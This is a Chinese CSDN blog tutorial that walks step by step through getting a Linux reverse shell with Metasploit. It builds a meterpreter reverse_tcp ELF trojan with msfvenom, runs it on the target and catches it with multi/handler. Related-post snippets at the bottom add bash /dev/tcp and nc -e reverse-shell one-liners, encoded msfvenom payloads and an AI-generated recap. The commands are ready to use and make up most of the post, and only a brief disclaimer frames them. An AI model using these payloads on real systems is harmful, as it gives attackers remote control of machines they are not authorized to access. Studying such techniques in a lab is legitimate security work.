msf--Linux反弹shell--一看就会的实验

已于 2022-09-23 16:43:41 修改
阅读量3.3k 收藏
点赞数 1
分类专栏: 内网渗透 漏洞复现 文章标签: linux ubuntu 安全性测试 系统安全 运维
于 2022-09-22 22:11:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxlxxxlx/article/details/127000968
版权
该博客详细描述了一次Linux环境下的渗透测试过程,包括在VPS上生成木马,通过rz/sz工具在Windows和Linux之间传输文件,赋予木马执行权限,执行木马并利用msfconsole设置监听器进行反向连接。整个过程旨在演示安全测试技术,强调不得用于非法活动。
摘要由CSDN通过智能技术生成

环境如下

vps :Linux ubuntu 4.15.0-180-generic (已经打开8989端口)

win:Windows Feature Experience Pack 120.2212.4180.0(可以随意)

靶机:Linux ubuntu 4.18.0-25-generic

过程如下

1.在vps里面生成木马
 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=8989 -f elf > asd

 2.将木马下载到本机桌面
sz asd

 

 3.将木马拖拽或者rz(上传)
    使用rz上传、sz下载,需要安装lrzsz模块
    apt install lrzsz

 4.cd到木马文件的目录下,使用ll查看是否有执行权限。

 5.执行木马
./asd

 6.切换到vps,进入到msfconsole工具
msfconsole

 7.进入到exploit/multi/handler模块,使用options查看需要配置的参数
use exploit/multi/handler
options

 8.修改payload模块、lhost参数、lport参数
set payload linux/x86/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxxx

 9.使用options查看是否配置成功,然后使用show missing
options
show missing

 

 10.使用run执行
run

 以上仅供参考,不得用于从事违法活动。

lxlxxxlx
关注
专栏目录
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1617
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
linux使用命令反弹msf
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-12 711
任选一个 payload 模块使用 ,这里我用。handler 以后台的方式监听,更方便打开。如果在shell 状态 ,要先用。
内网安全:反弹shell
最新发布
8888的博客
09-10 1518
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
msf反弹shell
weixin_34179762的博客
05-15 1003
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
linux反弹shell
afjkslahdfkaJDHU的博客
11-26 2433
0x01. bash 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 解释: bash -i 打开一个交互的bash >& 将标准错误输出重定向到标准输出 /dev/tcp/x.x...
msf反弹php shell,msf实现linux shell反弹
weixin_42488997的博客
03-22 761
运行环境:kali ip:192.168.123.90Linux ip:192.168.123.5Linux服务器上开有80端口,并且有上传话不多说,上传一句话,菜刀连接。然后打开kali 并启动msf进入> use exploit/multi/handler设置 payload> set payload php/metrpreter/reverse_tcp...
linux 常用反弹shell小记
weixin_30535167的博客
02-13 211
在渗透测试过程中由于防火墙和其它安全防御措施,很多服务器只能单向向外访问,不能被访问,我们常常需要反弹shell。 1.bash反弹shell 本地开启监听 nc -lvvp 8080 受害主机命令 bash -i >& /dev/tcp/192.168.109.131/8080 0>&1 收到反弹回来的shell 2. ...
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 809
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
Linux/Windows反弹shell
weixin_45253622的博客
05-28 2601
目录食用 Linux反弹shell bash反弹 加密bash反弹shell的流量 Python反弹 nc反弹 Telnet反弹 socat反弹 其他命令反弹 Windows反弹shell Powershell反弹nc shell 使用MSF反弹shell Linux反弹shell 攻击机:192.168.41.142 靶机:192.168.41.138 bash反弹 Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,也就是比如vim...
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4753
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
云服务器msf跨域反弹shell
iuyoo的博客
03-29 6016
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能监听不到话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
Linux中一句话反弹Shell细说
一杯咖啡的渗透记忆
08-11 494
简介 我们在渗透测试的过程中经常遇到linux主机环境,而在获取linux主机shell是我们经常需要做的是工作内容之一,其中经常遇到以下几个场景。 一、场景一 我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的直接下载安装一个,具体开启监听的命令如下。 1.1 安装netcat 这里需要注意一点默认的各个linux发行版本已经自带了ne
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 5516
msf
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 989
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
Linux反弹Shell方法
weixin_43873557的博客
02-08 1943
文章目录Linux反弹Shell方法Linux标准文件描述符更改标准输出的位置更改标准输入的位置/dev/null重定向输入重定向输出重定向管道反弹shell的本质什么是反弹shell实现控制端和被控端之间的交互反弹shell方法NCBashPerlPythonPHPRubyTelnetOpenSSLRefer Linux反弹Shell方法 Linux标准文件描述符 Linux系统将所有设备都当作文件来处理,而Linux用文件描述符来标识每个文件对象。当Linux启动的时候默认打开三个文件描述符。
linux反弹shell方法
weixin_53747497的博客
07-12 2173
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
msf生成linux shellcode,MSF-Shellcode生成和使用
weixin_33344952的博客
05-13 595
1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...
利用msf在windows下反弹shell
Jiajiajiang_的博客
08-08 7176
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
msf反弹shell linux
07-28
MSF(Metasploit Framework)是一个功能强大的渗透测试工具,它提供了生成一句话反弹shell的工具msfvenom。使用msfvenom可以生成各种类型的命令行一句话反弹shell。具体使用方法如下: 1. 首先,打开终端并输入以下命令来生成一句话反弹shell的payload: ``` msfvenom -p linux/x86/shell_reverse_tcp LHOST=<攻击者IP> LPORT=<监听端口> -f <输出格式> -o <输出文件> ``` 其中,`<攻击者IP>`是你的公网IP地址,`<监听端口>`是你希望监听的端口号,`<输出格式>`是你希望生成的payload的格式,例如`elf`或`raw`,`<输出文件>`是生成的payload保存的文件名。 2. 接下来,你可以将生成的payload传输到目标Linux机器上。你可以使用各种方法,例如通过邮件、FTP或者直接复制到目标机器上。 3. 在目标机器上,你需要执行payload来建立与攻击者的连接。你可以使用以下命令来执行payload: ``` bash <payload文件> ``` 其中,`<payload文件>`是你传输到目标机器上的payload文件名。 4. 一旦目标机器执行了payload,它将与你的攻击机器建立连接,并将shell反弹给你。 请注意,使用Metasploit和msfvenom进行渗透测试需要遵守法律和道德规范。只能在合法授权的范围内使用这些工具。 #### 引用[.reference_title] - *1* *2* [渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试](https://blog.csdn.net/qq_39611230/article/details/115751964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [linux各种一句话反弹shell总结](https://blog.csdn.net/qq_50854790/article/details/122558518)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值